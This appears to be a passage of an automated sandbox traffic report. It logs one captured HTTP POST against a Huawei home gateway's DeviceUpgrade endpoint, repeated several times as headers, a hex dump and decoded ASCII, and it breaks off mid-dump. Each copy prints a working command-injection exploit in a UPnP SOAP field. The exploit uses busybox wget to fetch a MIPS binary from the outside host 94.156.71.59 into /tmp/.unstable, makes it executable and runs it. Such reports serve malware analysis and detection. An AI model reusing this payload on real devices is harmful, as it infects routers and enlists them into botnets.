?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 